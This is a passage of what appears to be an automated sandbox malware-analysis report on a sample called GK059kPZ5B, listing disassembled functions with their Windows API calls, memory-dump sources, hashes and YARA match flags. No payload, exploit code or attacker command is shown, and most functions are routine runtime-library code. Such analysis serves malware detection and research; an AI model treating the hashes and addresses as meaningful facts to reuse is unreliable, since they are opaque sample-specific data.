                                                            • Opcode Fuzzy Hash: 50f1f6500ce61f8077431c98347a8527c5f1f934838e9231b30eeddca4b7b1fa
                                                            • Instruction Fuzzy Hash: F8021A71E012199FDF14CFA9C9806AEB7F1EF88314F25C26AD919E7345E731AA41CB90
                                                            Function 00A52621 Relevance: 3.1, APIs: 2, Instructions: 129nativewindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00A52648
                                                            • PostQuitMessage.USER32(00000000), ref: 00A527EA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessageNtdllPostProc_QuitWindow
                                                            • String ID:
                                                            • API String ID: 4264772764-0
                                                            • Opcode ID: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                            • Instruction ID: 1139ec63376d2fb0c2f34b9add904424acb2ffb0739966906b0e142a43b38e97
                                                            • Opcode Fuzzy Hash: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                            • Instruction Fuzzy Hash: 37410C25A65384A4E730EFA5FC15B2527B0FF64762F10243BE528CB2B2E3B18584C30E
                                                            Function 00436CDF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CDA,?,?,00000008,?,?,0043F19B,00000000), ref: 00436F0C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                            • Instruction ID: 56894988d221dc275bbeb5d863802b50bab2a0c2ec5e1dae9116b4c396cbcd5f
                                                            • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                            • Instruction Fuzzy Hash: 58B15D3521060AAFD715CF28C48AB657BE0FF09364F26D659E899CF3A1C339D992CB44
                                                            Function 00A86F46 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A86F41,?,?,00000008,?,?,00A8F402,00000000), ref: 00A87173
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                            • Instruction ID: c7ad49ef9b8b92c9b5011a8b2fe8be7802f33624aed4f488eafeee07802ade7f
                                                            • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                            • Instruction Fuzzy Hash: F2B13B316246099FD715DF28C48AB697BF0FF45364F398658E899CF2A1C336E991CB40
                                                            Function 0043B665 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B6B9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free$InfoLocale
                                                            • String ID:
                                                            • API String ID: 2955987475-0
                                                            • Opcode ID: f248db6eca06ff892e51bce8bbfaaacfef81b0ccb26f5c1b1a4e2b53f037ebcf
                                                            • Instruction ID: b1e829de63a4cfdbbeb590434fbc272015d29a09e68feb3eb70f55beb1ad3412
                                                            • Opcode Fuzzy Hash: f248db6eca06ff892e51bce8bbfaaacfef81b0ccb26f5c1b1a4e2b53f037ebcf
                                                            • Instruction Fuzzy Hash: 5921B33291020A9BDB249E25CC42BBB73A8EF48314F10217BFE01DA241EB399D45CB99
                                                            Function 00A8B8CC Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A821C0
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821CD
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A8B920
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$_free$InfoLocale
                                                            • String ID:
                                                            • API String ID: 2955987475-0
                                                            • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                            • Instruction ID: 481dbdf68920ceebcc5cb1e7bd8fd3cad969251e6bb0f57489e3635292413919
                                                            • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                            • Instruction Fuzzy Hash: 3A21923292020AABDF24BF65DD42BBA77ACEF04710F10017AEE01C6241EB799D54CB60
                                                            Function 0043B2ED Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                            • EnumSystemLocalesW.KERNEL32(0043B415,00000001,00000000,?,004307D5,?,0043BA42,00000000,?,?,?), ref: 0043B35F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                            • String ID:
                                                            • API String ID: 2016158738-0
                                                            • Opcode ID: f5690584e9ad499021b42ce56d8f8de17484a935533950cab043c7ceb3897eb3
                                                            • Instruction ID: db3c9ccc80d1476fb6d66557201e2f3895761b13365cb69cd331a803ccf2be29
                                                            • Opcode Fuzzy Hash: f5690584e9ad499021b42ce56d8f8de17484a935533950cab043c7ceb3897eb3
                                                            • Instruction Fuzzy Hash: C911063B6007019FDB189F39C8917BAB791FF88318F15442EEA8687B40D375A902C784
                                                            Function 00A8B554 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                            • EnumSystemLocalesW.KERNEL32(0043B415,00000001,00000000,?,00A80A3C,?,00A8BCA9,00000000,?,?,?), ref: 00A8B5C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                            • String ID:
                                                            • API String ID: 2016158738-0
                                                            • Opcode ID: cce71207e2b51a43ae620771f06a8e25d222029b64e0dc1c2990edcd69b9ccff
                                                            • Instruction ID: c97fae5cc13a70cad2051158abae4d801ac739f329f43ed2f58cff05b8b5ce09
                                                            • Opcode Fuzzy Hash: cce71207e2b51a43ae620771f06a8e25d222029b64e0dc1c2990edcd69b9ccff
                                                            • Instruction Fuzzy Hash: CA11E53A2107059FDB1CAF39C8A16BABB91FF84758B14453DEA4787B40E771A942CB50
                                                            Function 0043B895 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B633,00000000,00000000,?), ref: 0043B8C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$InfoLocale_free
                                                            • String ID:
                                                            • API String ID: 787680540-0
                                                            • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                            • Instruction ID: cee2b43c6a9fd0cc18a312a7fa4a4d5932635e218f943acbfed5d814f3d68c37
                                                            • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                            • Instruction Fuzzy Hash: 79F0F936A00215ABDB2C6A26DC067BB775CEF44754F15442AEE05A3240EB39BE4186D8
                                                            Function 00A8B8C2 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A821C0
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821CD
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A8B920
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$_free$InfoLocale
                                                            • String ID:
                                                            • API String ID: 2955987475-0
                                                            • Opcode ID: b02de80145afd5f894115aac2fdb7f166548fa9ffbe0bf9dd33173edd63a3eb6
                                                            • Instruction ID: 5d9903d04d685fe78b92f9559d9e8683248eb4fb88044fe4a413b89eb1510578
                                                            • Opcode Fuzzy Hash: b02de80145afd5f894115aac2fdb7f166548fa9ffbe0bf9dd33173edd63a3eb6
                                                            • Instruction Fuzzy Hash: 7A012632B51115DBCB04AF74DD85ABA73A8EF05311F0041BAEF02DB282DB359D058750
                                                            Function 00A8BAFC Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00A8B89A,00000000,00000000,?), ref: 00A8BB28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$InfoLocale_free
                                                            • String ID:
                                                            • API String ID: 787680540-0
                                                            • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                            • Instruction ID: 02d2aafff9c127fcbf382e064ab11e37528941d3a4b4be4f047a55a0f4242296
                                                            • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                            • Instruction Fuzzy Hash: 5DF0F932A60115ABDB24BB648C49BBA7768EB40714F140429ED06A3184EB70FD01C7E4
                                                            Function 0043B388 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                            • EnumSystemLocalesW.KERNEL32(0043B665,00000001,?,?,004307D5,?,0043BA06,004307D5,?,?,?,?,?,004307D5,?,?), ref: 0043B3D4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                            • String ID:
                                                            • API String ID: 2016158738-0
                                                            • Opcode ID: d6cb40d020c0f10101038f95f210870574939c9cf499dc93c49f7b68341f8f2e
                                                            • Instruction ID: 8e36b55a9bc7705faaba13b87098130e4a65547030758f83ed228488c18c5ef1
                                                            • Opcode Fuzzy Hash: d6cb40d020c0f10101038f95f210870574939c9cf499dc93c49f7b68341f8f2e
                                                            • Instruction Fuzzy Hash: BCF0C2362003045FDB145F3A9C92B6A7B95EF88768F15852EFE468B650D7B59C02C684
                                                            Function 00A8B5EF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                            • EnumSystemLocalesW.KERNEL32(0043B665,00000001,00000006,?,00A80A3C,?,00A8BC6D,00A80A3C,?,?,?,?,?,00A80A3C,?,?), ref: 00A8B63B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                            • String ID:
                                                            • API String ID: 2016158738-0
                                                            • Opcode ID: 8a71536dd7903a37c32e393faf36bdd1bfe0e15f9a3a0bcd0082b4142840c2ea
                                                            • Instruction ID: a425633074b2dd61e0850c401ed61a41c3dda10dbb83182388a34dc4e2c64a84
                                                            • Opcode Fuzzy Hash: 8a71536dd7903a37c32e393faf36bdd1bfe0e15f9a3a0bcd0082b4142840c2ea
                                                            • Instruction Fuzzy Hash: DFF0C2363007045FDB146F399C81B7ABB95EF85768F15453DFA058B690E7719C028754
                                                            Function 00434DED Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0042E40D: EnterCriticalSection.KERNEL32(?,?,00431C9A,?,00457A38,00000008,00431D68,?,?,?), ref: 0042E41C
                                                            • EnumSystemLocalesW.KERNEL32(00434DA7,00000001,00457BB8,0000000C), ref: 00434E25
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                            • String ID:
                                                            • API String ID: 1272433827-0
                                                            • Opcode ID: 7994b66f8d059e0a4ea4c0566bc6fd84287e6518e046040a995cb3296bdf7f9b
                                                            • Instruction ID: 31781df083fb6f98b94d2300e169204e9eab98a1842135cb0ce39f8875023ccf
                                                            • Opcode Fuzzy Hash: 7994b66f8d059e0a4ea4c0566bc6fd84287e6518e046040a995cb3296bdf7f9b
                                                            • Instruction Fuzzy Hash: 57F04F32A103009FD754EF69E906B8D77E0AB49726F10426AF910DB2E2CB7999848F49
                                                            Function 00A85054 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00A7E674: RtlEnterCriticalSection.NTDLL(00600DD4), ref: 00A7E683
                                                            • EnumSystemLocalesW.KERNEL32(00434DA7,00000001,00457BB8,0000000C), ref: 00A8508C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                            • String ID:
                                                            • API String ID: 1272433827-0
                                                            • Opcode ID: 91255582852f62f49bbb7f6d609e28063f3a8d390254579dd7c371b3acb579f0
                                                            • Instruction ID: 51f558dda61388eaa4daf86d2cb2f4f3e15a26b4576943018aec81025871a8fa
                                                            • Opcode Fuzzy Hash: 91255582852f62f49bbb7f6d609e28063f3a8d390254579dd7c371b3acb579f0
                                                            • Instruction Fuzzy Hash: 08F03C32A10304DFE710EF68DA06B5D77F0AF45711F108265F914DB2E2CB759A408B4A
                                                            Function 0043B2A2 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                            • EnumSystemLocalesW.KERNEL32(0043B1F9,00000001,?,?,?,0043BA64,004307D5,?,?,?,?,?,004307D5,?,?,?), ref: 0043B2D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                            • String ID:
                                                            • API String ID: 2016158738-0
                                                            • Opcode ID: 5abaff1671bb674c6eafe0f2cce25488b1c0be8fa004c8119abb9d1d27339480
                                                            • Instruction ID: 792a508546450a8c62dd781f30710cea9d26762123306e32df2f83f98e4bbb46
                                                            • Opcode Fuzzy Hash: 5abaff1671bb674c6eafe0f2cce25488b1c0be8fa004c8119abb9d1d27339480
                                                            • Instruction Fuzzy Hash: 62F0203A30020497CB04AF7AD85A76BBF90EBC5B54F0A409AEF098B250C6399842C798
                                                            Function 00A8B509 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                            • EnumSystemLocalesW.KERNEL32(0043B1F9,00000001,00000006,?,?,00A8BCCB,00A80A3C,?,?,?,?,?,00A80A3C,?,?,?), ref: 00A8B540
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                            • String ID:
                                                            • API String ID: 2016158738-0
                                                            • Opcode ID: 7e45c69b4bd48ea0a58e1bc64ad8673d17a770c848b88e6c6a4e287bad9e638c
                                                            • Instruction ID: be25807d3efc6763acd1d7402c29d2edb66d99f2802ce7bb8b08c3529ec48693
                                                            • Opcode Fuzzy Hash: 7e45c69b4bd48ea0a58e1bc64ad8673d17a770c848b88e6c6a4e287bad9e638c
                                                            • Instruction Fuzzy Hash: 8FF0553A30020497CB08AF7ADC0976ABF90EFC1B50F1A0059EF0A8B250C331D842C7A0
                                                            Function 00410686 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00010692,0040FC1E), ref: 0041068B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                            • Instruction ID: 98c1b70154c3c6394ebbf277c14e22134dfc73ab602bc766ac458664b600bd4b
                                                            • Opcode Fuzzy Hash: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                            • Instruction Fuzzy Hash:
                                                            Function 00A608ED Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00410692,00A5FE85), ref: 00A608F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                            • Instruction ID: 98c1b70154c3c6394ebbf277c14e22134dfc73ab602bc766ac458664b600bd4b
                                                            • Opcode Fuzzy Hash: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                            • Instruction Fuzzy Hash:
                                                            Function 0043BBE1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                            • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                            • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                            • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                            Function 004373F9 Relevance: .6, Instructions: 637COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                            • Instruction ID: b4093df590a21e34b028a8b1fc7d27a52c9cbab165512cb59d6a43ae298a81d2
                                                            • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                            • Instruction Fuzzy Hash: 61324661D68F014DE7339634C822336A698AFBB3D4F15E737F859B5EA6EB28C4834105
                                                            Function 004071D0 Relevance: .4, Instructions: 378COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e46bd4f707ba7a9ceb031d9cd86521102eb103cae0c179e5e6aa0592395d1ff4
                                                            • Instruction ID: 8d7dcf63c468df939a74f501716ec15b8f2183c69ee07cfca9113f75d84f5853
                                                            • Opcode Fuzzy Hash: e46bd4f707ba7a9ceb031d9cd86521102eb103cae0c179e5e6aa0592395d1ff4
                                                            • Instruction Fuzzy Hash: C3E19270A08612EFD714CF24C590AAAB7F1FF44304B14456ED856ABB81D738FC61DB96
                                                            Function 00A7770B Relevance: .4, Instructions: 356COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 00d6ba4a2d84f0801e1b0a96c170955ef3db55fa66fb4acd58968073f34e18d5
                                                            • Instruction ID: 23bab09d3e90f95e144a1183c3589519aec0b34a7779393797316931aafda1ce
                                                            • Opcode Fuzzy Hash: 00d6ba4a2d84f0801e1b0a96c170955ef3db55fa66fb4acd58968073f34e18d5
                                                            • Instruction Fuzzy Hash: BAD1C43220D1A24ECB6D4B3A8C7403EBFF16A522A131EC79DD4FBCA5C6ED24D954D660
                                                            Function 00427D87 Relevance: .3, Instructions: 254COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
